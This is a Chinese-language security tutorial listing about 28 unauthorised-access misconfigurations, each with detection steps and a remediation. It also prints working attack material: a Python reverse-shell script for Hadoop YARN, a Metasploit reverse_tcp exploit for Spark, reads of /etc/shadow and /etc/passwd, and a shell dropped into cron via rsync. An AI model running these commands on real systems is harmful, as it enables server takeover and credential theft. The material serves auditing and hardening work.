HVV必備|二十八種未授權訪問漏洞合集

這篇文章主要收集一些常見的未授權訪問漏洞。未授權訪問漏洞可以理解為需要安全配置或許可權認證的地址、授權頁面存在缺陷導致其他使用者可以直接訪問從而引發重要許可權可被操作、資料庫或網站目錄等敏感資訊洩露。

0x01 未授權漏洞預覽

Active MQ 未授權訪問Atlassian Crowd 未授權訪問CouchDB 未授權訪問Docker 未授權訪問Dubbo 未授權訪問Druid 未授權訪問Elasticsearch 未授權訪問FTP 未授權訪問Hadoop 未授權訪問JBoss 未授權訪問Jenkins 未授權訪問Jupyter Notebook 未授權訪問Kibana 未授權訪問Kubernetes Api Server 未授權訪問LDAP 未授權訪問MongoDB 未授權訪問Memcached 未授權訪問NFS 未授權訪問Rsync 未授權訪問Redis 未授權訪問RabbitMQ 未授權訪問Solr 未授權訪問Spring Boot Actuator 未授權訪問Spark 未授權訪問VNC 未授權訪問Weblogic 未授權訪問ZooKeeper 未授權訪問Zabbix 未授權訪問

0x02 Active MQ 未授權訪問

1。 漏洞簡介

ActiveMQ 是一款流行的開源訊息伺服器。預設情況下,ActiveMQ 服務是沒有配置安全引數。惡意人員可以利用預設配置弱點發動遠端命令執行攻擊,獲取伺服器許可權,從而導致資料洩露。

2。漏洞檢測

預設埠:8161

預設密碼:admin/admin

HVV必備|二十八種未授權訪問漏洞合集

3。漏洞修復

針對未授權訪問,可修改conf/jetty。xml檔案,bean id為securityConstraint下的authenticate修改值為true,重啟服務即可。

針對弱口令,可修改conf/jetty。xml檔案,bean id 為securityLoginService下的conf值獲取使用者properties,修改使用者名稱密碼,重啟服務即可。

參考文章 https://www。ouyangxiaoze。com/2020/08/631。html

0x03 Atlassian Crowd 未授權訪問

1。漏洞簡介

Atlassian Crowd是一套基於Web的單點登入系統。該系統為多使用者、網路應用程式和目錄伺服器提供驗證、授權等功能。Atlassian Crowd Data Center是Crowd的叢集部署版。

Atlassian Crowd和Crowd Data Center在其某些發行版本中錯誤地啟用了pdkinstall開發外掛,使其存在安全漏洞。攻擊者利用該漏洞可在未授權訪問的情況下對Atlassian Crowd和Crowd Data Center安裝任意的惡意外掛,執行任意程式碼/命令,從而獲得伺服器許可權。

2。漏洞檢測

漏洞利用指令碼github地址:https://github。com/jas502n/CVE-2019-11580

git clone https://github。com/jas502n/CVE-2019-11580cd CVE-2019-11580/python CVE-2019-11580。py http://192。168。18。138:8095curl http://192。168。18。138:8095/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow

3。漏洞修復

設定訪問/crowd/admin/uploadplugin。action的源ip。

升級最新版本(3。5。0以上)。

0x04 CouchDB 未授權訪問

1。漏洞簡介

Apache CouchDB 是一個開源資料庫,預設會在5984埠開放Restful的API介面,如果使用SSL的話就會監聽在6984埠,用於資料庫的管理功能。其HTTP Server預設開啟時沒有進行驗證,而且繫結在0。0。0。0,所有使用者均可透過API訪問導致未授權訪問。

在官方配置文件中對HTTP Server的配置有WWW-Authenticate:Set this option to trigger basic-auth popup on unauthorized requests,但是很多使用者都沒有這麼配置,導致漏洞產生。

2。漏洞檢測

使用vulhub搭建漏洞環境用於測試演示

cd /vulhub/couchdb/CVE-2017-12636docker-compose up -d

未授權訪問測試命令

curl 192。168。126。130:5984curl 192。168。126。130:5984/_config

HVV必備|二十八種未授權訪問漏洞合集

3。漏洞修復

指定CouchDB繫結的IP (需要重啟CouchDB才能生效)在 /etc/couchdb/local。ini 檔案中找到 “bind_address = 0。0。0。0” ,把 0。0。0。0 修改為 127。0。0。1 ,然後儲存。 注:修改後只有本機才能訪問CouchDB。

設定訪問密碼(需要重啟CouchDB才能生效)在 /etc/couchdb/local。ini 中找到“[admins]”欄位配置密碼。

設定WWW-Authenticate,強制認證。

0x05 Docker 未授權訪問

1。漏洞簡介

該未授權訪問漏洞是因為Docker API可以執行Docker命令,該介面是目的是取代Docker命令介面,透過URL操作Docker。

Docker API 未授權訪問漏洞分析和利用

2。漏洞檢測

使用vulhub搭建漏洞環境用於測試演示

cd /vulhub/docker/unauthorized-rcedocker-compose builddocker-compose up -d

直接輸入地址

http://your-ip:2375/version

;若能訪問,證明存在未授權訪問漏洞。

HVV必備|二十八種未授權訪問漏洞合集

3。漏洞修復

對2375埠做網路訪問控制,如ACL控制,或者訪問規則;

修改docker swarm的認證方式,使用TLS認證;

0x06 Dubbo 未授權訪問

1。漏洞簡介

Dubbo是阿里巴巴公司開源的一個高效能優秀的 服務框架,使得應用可透過高效能的 RPC 實現服務的輸 出和輸入功能,可以和 Spring框架無縫整合。dubbo 因配置不當導致未授權訪問漏洞。

2。漏洞檢測

連線進入dubbo 服務,進行操作

telent IP port

HVV必備|二十八種未授權訪問漏洞合集

HVV必備|二十八種未授權訪問漏洞合集

3。漏洞修復

配置dubbo認證;

設定防火牆策略,限定IP訪問;

0x07 Druid 未授權訪問

1。漏洞簡介

Druid是阿里巴巴資料庫出品的,為監控而生的資料庫連線池,並且Druid提供的監控功能,監控SQL的執行時間、監控Web URI的請求、Session監控,首先Druid是不存在什麼漏洞的。但當開發者配置不當時就可能造成未授權訪問。

2。漏洞檢測

直接在網站的url中後加上:

/druid/index。html/druid/websession。html/druid/datasource。html/druid/sql。html/druid/spring。html

如果可以無需登入,即可登入到Druid監控介面,則說明該網站存在Druid未授權訪問漏洞

HVV必備|二十八種未授權訪問漏洞合集

3。漏洞修復

配置訪問賬號密碼;

禁止對外網開放訪問;

0x08 Elasticsearch 未授權訪問

1。漏洞簡介

Elasticsearch是一款java編寫的企業級搜尋服務。越來越多的公司使用ELK作為日誌分析,啟動此服務預設會開放9200埠或者9300埠,可被非法操作資料。

2。漏洞檢測

未授權訪問測試命令

http://localhost:9200/_cat/indiceshttp://localhost:9200/_river/_search #檢視資料庫敏感資訊http://localhost:9200/_nodes #檢視節點資料

HVV必備|二十八種未授權訪問漏洞合集

3。漏洞修復

訪問控制策略,限制IP訪問,繫結固定IP;

在config/elasticsearch。yml中為9200埠設定認證等;

0x09 FTP 未授權訪問

1。漏洞簡介

FTP 弱口令或匿名登入漏洞,一般指使用 FTP 的使用者啟用了匿名登入功能,或系統口令的長度太短、複雜度不夠、僅包含數字、或僅包含字母等,容易被駭客攻擊,發生惡意檔案上傳或更嚴重的入侵行為。

2。漏洞檢測

直接訪問ftp路徑:

ftp://ip:port/

HVV必備|二十八種未授權訪問漏洞合集

3。漏洞修復

禁止匿名登入;

配置強密碼,密碼長度建議八位以上,且密碼應包括大小寫字母、特殊字元、數字混合體;

0x10 HadoopYARN 未授權訪問

1。漏洞簡介

Hadoop是一款由Apache基金會推出的分散式系統框架,它透過著名的MapReduce演算法進行分散式處理,Yarn是Hadoop叢集的資源管理系統。

2。漏洞檢測

使用vulhub搭建漏洞演示環境

cd /vulhub/hadoop/unauthorized-yarndocker-compose up -d

環境啟動後,沒有配置身份認證,可以未授權訪問到Hadoop YARN ResourceManager WebUI頁面。

http://192。168。126。130:8088/http://192。168。126。130:8088/cluster

HVV必備|二十八種未授權訪問漏洞合集

利用該漏洞,可以進一步getshell

HVV必備|二十八種未授權訪問漏洞合集

指令碼原始碼如下:rce。py

#!/usr/bin/env pythonimport requeststarget = ‘http://192。168。126。130:8088/’ # 設定目標主機的ip地址lhost = ‘192。168。126。128’ # 設定你攻擊主機的監聽ip地址,並且監聽埠為9999url = target + ‘ws/v1/cluster/apps/new-application’resp = requests。post(url)app_id = resp。json()[‘application-id’]url = target + ‘ws/v1/cluster/apps’data = { ‘application-id’: app_id, ‘application-name’: ‘get-shell’, ‘am-container-spec’: { ‘commands’: { ‘command’: ‘/bin/bash -i >& /dev/tcp/%s/9999 0>&1’ % lhost, }, }, ‘application-type’: ‘YARN’,}requests。post(url, json=data)

3。漏洞修復

升級Hadoop到2。x版本以上,並啟用Kerberos認證功能,禁止匿名訪問;

設定“安全組”訪問控制策略,將 Hadoop 預設開放的多個埠對公網全部禁止或限制可信任的 IP 地址才能訪問包括 50070 以及 WebUI 等相關埠;

如無必要,關閉 Hadoop Web 管理頁面;

0x11 JBoss 未授權訪問

1。漏洞簡介

漏洞簡述JBOSS 企業應用平臺EAP是 J2EE 應用的中介軟體平臺。預設情況下訪問

http://ip:8080/jmx-console

就可以瀏覽 Jboss 的部署管理的資訊不需要輸入使用者名稱和密碼可以直接部署上傳木馬有安全隱患。

2。漏洞檢測

直接訪問

http://ip:port/

看是否能進入 jmx-console 和 web-console 頁面

http://ip:8080/http://ip:8080/jmx-console/http://ip:8080/jbossws/

HVV必備|二十八種未授權訪問漏洞合集

3。漏洞修復

新增 JMX 控制頁面身份認證;

進行JMX Console 安全配置;

關閉jmx-console和web-console;

0x12 Jenkins 未授權訪問

1。漏洞簡介

預設情況下Jenkins面板中使用者可以選擇執行指令碼介面來操作一些系統層命令,攻擊者可透過未授權訪問漏洞或者暴力破解使用者密碼等進指令碼執行介面從而獲取伺服器許可權。

2。漏洞檢測

直接透過url輸入以下地址,若能訪問,證明存在未授權訪問漏洞。

http://:8080/managehttp://:8080/script

HVV必備|二十八種未授權訪問漏洞合集

未授權訪問

http://:8080/script

可以執行系統命令

# 命令格式println “whoami”。execute()。text

HVV必備|二十八種未授權訪問漏洞合集

3。漏洞修復

對後臺控制頁面做登入驗證限制;

升級Jenkins至新版本;

禁止把Jenkins直接暴露在公網;

0x13 Jupyter Notebook 未授權訪問

1。漏洞簡介

Jupyter Notebook(此前被稱為 IPython notebook)是一個互動式筆記本,支援執行 40 多種程式語言。如果管理員未為Jupyter Notebook配置密碼,將導致未授權訪問漏洞,遊客可在其中建立一個console並執行任意Python程式碼和命令。

2。漏洞檢測

使用vulhub搭建漏洞演示環境

cd /vulhub/jupyter/notebook-rcedocker-compose up -d

執行後,訪問

http://your-ip:8888

將看到Jupyter Notebook的Web管理介面,並沒有要求填寫密碼。

HVV必備|二十八種未授權訪問漏洞合集

選擇 new -> terminal 即可建立一個控制檯:

HVV必備|二十八種未授權訪問漏洞合集

直接執行任意命令:

HVV必備|二十八種未授權訪問漏洞合集

3。漏洞修復

訪問控制策略,限制IP訪問,繫結固定IP;

0x14 Kibana 未授權訪問

1。漏洞簡介

Kibana如果允許外網訪問,沒有做安全的登入認證,也會被外部隨意訪問檢視所有的資料,造成少資料洩露。

2。漏洞檢測

直接訪問kibana的頁面

http://192。168。126。130:5601/https://192。168。126。130/app/kibana#http://192。168。126。130:5601/app/kibana#/

無需賬號密碼可以登入進入介面

HVV必備|二十八種未授權訪問漏洞合集

3。漏洞修復

設定kibana監聽本地地址,並設定ElasticSearch登入的賬號和密碼;

設定防火牆策略,限定IP訪問服務;

0x15 Kubernetes Api Server 未授權

1。漏洞簡介

Kubernetes 的服務在正常啟動後會開啟兩個埠:Localhost Port (預設8080)、Secure Port (預設6443)。這兩個埠都是提供 Api Server 服務的,一個可以直接透過 Web 訪問,另一個可以透過 kubectl 客戶端進行呼叫。如果運維人員沒有合理的配置驗證和許可權,那麼攻擊者就可以透過這兩個介面去獲取容器的許可權。

2。漏洞檢測

使用nmap尋找相關的埠和服務,直接訪問脆弱的服務

埠:8080

http://10。10。4。89:8080/

HVV必備|二十八種未授權訪問漏洞合集

埠:8080:api dashboard:

http://10。10。4。89:8080/ui

HVV必備|二十八種未授權訪問漏洞合集

埠:10250埠是kubelet API的HTTPS埠,透過路徑/pods獲取環境變數、執行的容器資訊、名稱空間等資訊。

HVV必備|二十八種未授權訪問漏洞合集

3。漏洞修復

進行授權認證;

使用Service Account令牌;

設定防火牆策略,限定IP訪問服務;

0x16 LDAP 未授權訪問

1。漏洞簡介

LDAP中文全稱為:輕型目錄訪問協議(Lightweight Directory Access Protocol),預設使用389, LDAP 底層一般使用 TCP 或 UDP 作為傳輸協議。目錄服務是一個特殊的資料庫,是一種以樹狀結構的目錄資料庫為基礎。未對LDAP的訪問進行密碼驗證,導致未授權訪問。

2。漏洞檢測

使用nmap尋找到相關的LDAP伺服器,可以使用ldapbrowser直接連線,獲取目錄內容。

HVV必備|二十八種未授權訪問漏洞合集

3。漏洞修復

修改ldap的acl,禁止匿名訪問。

根據業務設定ldap訪問白名單或黑名單;

0x17 MongoDB 未授權訪問

1。漏洞簡介

開啟MongoDB服務時不新增任何引數時,預設是沒有許可權驗證的,登入的使用者可以透過預設埠無需密碼對資料庫任意操作(增、刪、改、查高危動作)而且可以遠端訪問資料庫。

造成未授權訪問的根本原因就在於啟動 Mongodb 的時候未設定 –auth 也很少會有人會給資料庫新增上賬號密碼(預設空口令),使用預設空口令這將導致惡意攻擊者無需進行賬號認證就可以登陸到資料伺服器。

2。漏洞檢測

安裝mongodb,然後連線到服務。

yum install mongodbmongo ——host 10。2。20。34 ——port 27017

HVV必備|二十八種未授權訪問漏洞合集

3。漏洞修復

限制繫結IP,啟動時加入引數

——bind_ip 127。0。0。1

或在

/etc/mongodb。conf

檔案中新增以下內容:

bind_ip = 127。0。0。1

admin。system。users

中新增使用者,啟動認證;

設定防火牆策略,限定 IP 訪問服務;

禁用HTTP和REST埠,修改配置檔案或在啟動的時候選擇引數

nohttpinterface=false

0x18 Memcached 未授權訪問

1。漏洞簡介

Memcached 埠對外開放並且沒有配置認證選項,未授權使用者可直接獲取資料庫中所有資訊,造成嚴重的資訊洩露。

2。漏洞檢測

無需使用者名稱密碼,可以直接連線memcache 服務的11211埠

telnet 10。10。4。89 11211# 或者nc -vv 11211

使用了 stats 命令來輸出 Memcached 服務資訊

HVV必備|二十八種未授權訪問漏洞合集

3。漏洞修復

修改繫結的IP、埠和指定訪問者IP;

設定防火牆策略;

禁止暴露在公網;

配置memcached監聽本地迴環地址

127。0。0。1

0x19 NFS 未授權訪問

1。漏洞簡介

Network File System(NFS),是由SUN公司研製的UNIX表示層協議(pressentation layer protocol),能使使用者訪問網路上別處的檔案就像在使用自己的計算機一樣。伺服器在啟用nfs服務以後,由於nfs服務未限制對外訪問,導致共享目錄洩漏。

2。漏洞檢測

#安裝nfs客戶端apt install nfs-common#檢視nfs伺服器上的共享目錄showmount -e 192。168。126。130#掛載相應共享目錄到本地mount -t nfs 192。168。126。130:/grdata /mnt#解除安裝目錄umount /mnt

3。漏洞修復

利用iptables限制埠2049和20048埠的訪問,禁止外部訪問;

設定/etc/exports,對訪問進行控制;

0x20 Rsync 未授權訪問

1。漏洞簡介

rsync是Linux/Unix下的一個遠端資料同步工具,可透過LAN/WAN快速同步多臺主機間的檔案和目錄,預設執行在873埠。由於配置不當,導致任何人可未授權訪問rsync,上傳本地檔案,下載伺服器檔案。

2。漏洞檢測

使用vulhub搭建漏洞演示環境

cd /vulhub/rsync/commondocker-compose builddocker-compose up -d

使用Rsync命令即可進行檢測。

rsync rsync://192。168。126。130:873/rsync rsync://192。168。126。130:873/src

HVV必備|二十八種未授權訪問漏洞合集

利用rsync下載任意檔案

rsync rsync://192。168。126。130:873/src/etc/passwd 。/

HVV必備|二十八種未授權訪問漏洞合集

或者寫入任意檔案

rsync -av shell rsync://192。168。126。130:873/src/etc/cron。d/shell

HVV必備|二十八種未授權訪問漏洞合集

3。漏洞修復

隱藏 module 資訊:修改配置檔案 list =false。

許可權控制:不需要寫入許可權的 module 的設定為只讀 Read only = true;

網路訪問控制:使用安全組策略或白名單限制,只允許必要訪問的主機訪問;

賬戶認證:只允許指定的使用者利用指定的密碼使用 rsync 服務;

資料加密傳輸:Rsync 預設沒有直接支援加密傳輸,如果需要 Rsync 同步重要性很高的資料,可以使用 ssh;

參考文章:https://www。freebuf。com/column/202771。html

0x21 Redis 未授權訪問

1。漏洞簡介

redis是一個數據庫,預設埠是6379,redis預設是沒有密碼驗證的,可以免密碼登入操作,攻擊者可以透過操作redis進一步控制伺服器。

Redis未授權訪問在4。x/5。0。5以前版本下,可以使用master/slave模式載入遠端模組,透過動態連結庫的方式執行任意命令。

2。漏洞檢測

kali安裝redis-cli遠端連線工具

wget http://download。redis。io/redis-stable。tar。gztar -zxvf redis-stable。tar。gzcd redis-stablemakecp src/redis-cli /usr/bin/redis-cli -h

使用redis-cli命令直接遠端免密登入redis主機

redis-cli -h 目標主機IP

HVV必備|二十八種未授權訪問漏洞合集

3。漏洞修復

禁止使用root許可權啟動redis服務;

對redis訪問啟動密碼認證;

新增IP訪問限制,並更改預設6379埠;

0x22 RabbitMQ 未授權訪問

1。漏洞簡介

RabbitMQ是目前非常熱門的一款訊息中介軟體,基於AMQP協議的,可以在釋出者和使用者之間交換非同步訊息。訊息可以是人類可讀的JSON,簡單字串或可以轉換為JSON字串的值列表。

2。漏洞檢測

預設賬號密碼都是guest

http://10。10。4。89:15672http://10。10。4。89:25672/http://10。10。4。89:15692/

HVV必備|二十八種未授權訪問漏洞合集

3。漏洞修復

修改為強密碼,刪除預設的賬號guest;

禁止對外網開放,僅限於內部訪問;

0x23 Solr 未授權訪問

1。漏洞簡介

Solr是一個高效能,採用Java開發,基於Lucene的全文搜尋伺服器。solr的管理介面通常包含如下資訊:solr的配置資訊(包括路徑,使用者名稱,系統版本資訊),資料庫的配置資訊(地址,使用者名稱,密碼),資料庫搜尋資料等。solr未授權訪問的危害很大,輕則可查詢所有資料庫資訊,重則可讀取系統任意檔案,甚至getshell。

2。漏洞檢測

敏感目錄掃描時加上一條 /solr/admin

http://xx。xx。com/solr/adminhttps://xx。xx。com/solr/admin

HVV必備|二十八種未授權訪問漏洞合集

3。漏洞修復

配置solr訪問控制權限;

禁止將solr暴露在公網;

0x24 SpringBoot Actuator 未授權訪問

1。漏洞簡介

Actuator 是 springboot 提供的用來對應用系統進行自省和監控的功能模組,藉助於 Actuator 開發者可以很方便地對應用系統某些監控指標進行檢視、統計等。在 Actuator 啟用的情況下,如果沒有做好相關許可權控制,非法使用者可透過訪問預設的執行器端點(endpoints)來獲取應用系統中的監控資訊,從而導致資訊洩露甚至伺服器被接管的事件發生。

2。漏洞檢測

直接訪問相關路徑:

http://10。2。20。48/autoconfig

請求方式

URL路徑

功能描述

get

/autoconfig

提供了一份自動配置報告,記錄哪些自動配置條件通過了,哪些沒透過

get

/configprops

描述配置屬性(包含預設值)如何注入 Bean

get

/beans

描述應用程式上下文裡全部的 Bean,以及它們的關係

get

/dump

獲取執行緒活動的快照

get

/env

獲取全部環境屬性

get

/env/{name}

根據名稱獲取特定的環境屬性值

get

/health

報告應用程式的健康指標,這些值由 HealthIndicator 的實現類提供

get

/info

獲取應用程式的定製資訊,這些資訊由 info 打頭的屬性提供

get

/mappings

描述全部的 URI 路徑,以及它們和控制器(包含 Actuator 端點)的對映關係

get

/metrics

報告各種應用程式度量資訊,比如記憶體用量和 HTTP 請求計數

get

/metrics/{name}

報告指定名稱的應用程式度量值

post

/shutdown

關閉應用程式,要求 endpoints。shutdown。enabled 設定為 true(預設為 false)

get

/trace

提供基本的 HTTP 請求跟蹤資訊(時間戳、HTTP 頭等)

3。漏洞修復

禁用/env介面;

升級到SpringBoot Actuator 2。0;

禁止對外開放;

0x25 Spark 未授權訪問

1。漏洞簡介

Apache Spark是一款叢集計算系統,其支援使用者向管理節點提交應用,並分發給叢集執行。如果管理節點未啟動訪問控制,攻擊者可以在叢集中執行任意程式碼。該漏洞的本質是未授權使用者可以向Master節點提交一個應用,Master節點會分發給Slave節點執行應用。如果應用中包含惡意程式碼,會導致任意程式碼執行,威脅Spark叢集整體的安全性。

2。漏洞檢測

nmap掃描出如下埠開放,則很有可能存在漏洞

6066/tcp open http Jetty 9。3。z-SNAPSHOT8081/tcp open http Jetty 9。3。z-SNAPSHOT8082/tcp open http Jetty 9。3。z-SNAPSHOT

HVV必備|二十八種未授權訪問漏洞合集

使用msf工具getshell

msf5>use exploit/linux/http/spark_unauth_rcemsf5>set payload java/meterpreter/reverse_tcpmsf5>set rhost 192。168。100。2msf5>set rport 6066msf5>set lhost 192。168。100。1msf5>set lport 4444msf5>set srvhost 192。168。100。1msf5>set srvport 8080msf5>exploit

3。漏洞修復

對外關閉敏感埠;

配置使用者許可權認證;

參考文章:https://www。cnblogs。com/KevinGeorge/p/10399844。html

0x26 VNC 未授權訪問

1。漏洞簡介

VNC 是虛擬網路控制檯Virtual Network Console的英文縮寫。它是一款優秀的遠端控制工具軟體由美國電話電報公司AT&T的歐洲研究實驗室開發。VNC是基於 UNXI 和 Linux 的免費開源軟體由 VNC Server 和 VNC Viewer 兩部分組成。

VNC 預設埠號為 5900、5901。VNC 未授權訪問漏洞如被利用可能造成惡意使用者直接控制受控主機危害相當嚴重。

2。漏洞檢測

使用 metasploit 進行批次檢測,使用檢測模組

auxiliary/scanner/vnc/vnx_none_auth

在kali上直接使用vncviewer命令連線主機。

vncviewer ip

3。漏洞修復

配置 VNC 客戶端登入口令認證並配置符合密碼強度要求的密碼;

以最小許可權的普通使用者身份執行作業系統;

0x27 Weblogic 未授權訪問

1。漏洞簡介

Weblogic是Oracle公司推出的J2EE應用伺服器,CVE-2020-14882允許未授權的使用者繞過管理控制檯的許可權驗證訪問後臺,CVE-2020-14883允許後臺任意使用者透過HTTP協議執行任意命令。使用這兩個漏洞組成的利用鏈,可透過一個GET請求在遠端Weblogic伺服器上以未授權的任意使用者身份執行命令。

2。漏洞檢測

使用vulhub搭建漏洞演示環境

cd vulhub/weblogic/CVE-2020-14882sudo docker-compose up -d

HVV必備|二十八種未授權訪問漏洞合集

攻擊者可以構造特殊請求的URL,即可未授權訪問到管理後臺頁面:

http://192。168。126。130:7001/console/css/%252e%252e%252fconsole。portal

HVV必備|二十八種未授權訪問漏洞合集

遠端攻擊者可以構造特殊的HTTP請求,在未經身份驗證的情況下接管 WebLogic Server Console ,並在 WebLogic Server Console 執行任意程式碼。

weblogic 許可權繞過命令執行漏洞復現

3。漏洞修復

下載補丁程式並安裝更新;

0x28 ZooKeeper 未授權訪問

1。漏洞簡介

ZooKeeper 是一個分散式的開放原始碼的分散式應用程式協調服務,ZooKeeper 預設開啟在 2181 埠在未進行任何訪問控制的情況下攻擊者可透過執行 envi 命令獲得系統大量的敏感資訊包括系統名稱Java 環境,任意使用者在網路可達的情況下進行為未授權訪問並讀取資料甚至 kill 服務。

2。漏洞檢測

stat:列出關於效能和連線的客戶端的統計資訊。

echo stat |ncat 127。0。0。1 2181

ruok:測試伺服器是否執行在非錯誤狀態。

echo ruok |ncat 127。0。0。1 2181

dump:列出未完成的會話和臨時節點。

echo dump |ncat 127。0。0。1 2181

3。漏洞修復

為ZooKeeper配置相應的訪問許可權;

設定防火牆策略;

禁止把Zookeeper直接暴露在公網;

0x29 Zabbix 未授權訪問

1。漏洞簡介

zabbix是一款伺服器監控軟體,預設服務開放埠為10051,其由server、agent、web等模組組成,其中web模組由PHP編寫,用來顯示資料庫中的結果。

2。漏洞檢測

無需賬戶密碼直接訪問zabbix頁面

HVV必備|二十八種未授權訪問漏洞合集

3。漏洞修復

設定zabbix的複雜口令,不要用預設口令或弱口令,禁用guest登入功能;

zabbix的server和agent都不要以root啟動,不要設定AllowRoot=1;

禁止agent執行system。run,不要設定EnableRemoteCommands=1;